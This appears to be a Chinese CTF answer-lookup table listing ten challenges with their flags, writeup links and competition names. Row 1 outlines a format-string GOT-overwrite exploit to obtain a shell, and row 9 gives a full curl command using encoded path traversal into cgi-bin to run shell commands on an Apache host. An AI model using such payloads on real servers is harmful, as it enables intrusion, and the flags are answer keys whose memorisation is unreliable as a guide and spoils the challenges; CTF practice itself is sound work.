[标题搜索]只能搜索题目标题,[综合搜索]支持多关键词多项目搜索(以空格分隔)。
| 序号 | Website | Type | Title | Value | Writeup | Competition | Id |
|---|---|---|---|---|---|---|---|
| 1 | BUUCTF | Pwn | watevr_2019_voting_machine_2 | [watevr_2019_voting_machine_2的解题答案为利用格式化字符串漏洞修改exit函数的GOT表项指向main函数,通过循环触发漏洞并最终劫持printf的GOT表为system函数实现getshell。具体步骤包括:1. 使用格式化字符串漏洞泄露地址;2. 构造payload覆盖exit GOT为main地址;3. 通过多次调用劫持printf GOT为system地址,输入/bin/sh获取shell。验证过程详见CSDN博客详细分析] | ... | - | 8705 |
| 2 | BUUCTF | Misc | [VNCTF2021]Check_In | vnctf{Have_a_good_time!} | https://blog.csdn.net/qq_49354488/art... | VNCTF2021 | 7562 |
| 3 | BUUCTF | Web | [QWB2021 Quals]托纳多 | flag{admin~glzjin666888} | https://blog.csdn.net/weixin_43610673... | QWB2021 Quals | 7379 |
| 4 | ctfshow | WEB入门.sql注入 | web222 | ctfshow{group_by_blind_injection_flag} | ... | sql注入 | 3511 |
| 5 | BUUCTF | Pwn | [DASCTF Sept X 浙江工业大学秋季挑战赛]hahapwn | 无 | https://blog.csdn.net/woodwhale/artic... | DASCTF Sept X 浙江工业大学秋季挑战赛 | 6308 |
| 6 | NSSCTF | REVERSE | [b01lers 2020]Spirit Tracks | 无 | https://github.com/b01lers/b01lers-ct... | b01lers | 13944 |
| 7 | ctfshow | MISC.愚人节欢乐赛 | Kanna Kamui | 题目答案文本 | 验证后的网址 Kanna... | 愚人节欢乐赛 | 4599 |
| 8 | qsnctf | 应急专项 | 应急响应2-31 | - | https://blog.csdn.net/2303_80857229/a... | 第二届“Parloo”CTF应急响应挑战赛 | 5685 |
| 9 | BUUCTF | Web | [NewStarCTF 公开赛赛道]Unsafe Apache | curl --data "echo;cat /ffffllll*" http://node4.buuctf.cn:27830/cgi-bin/.%%32e/.%%32e/.%%32e/.%%32e/bin/sh | http://www.anyiblog.top/2022/10/23/20221023/ | NewStarCTF 公开赛赛道 | 7261 |
| 10 | NSSCTF | 栈溢出 | [HGAME 2022 week1]test your gdb | 无 | https://blog.csdn.net/qq_29912475/art... | HGAME | 10766 |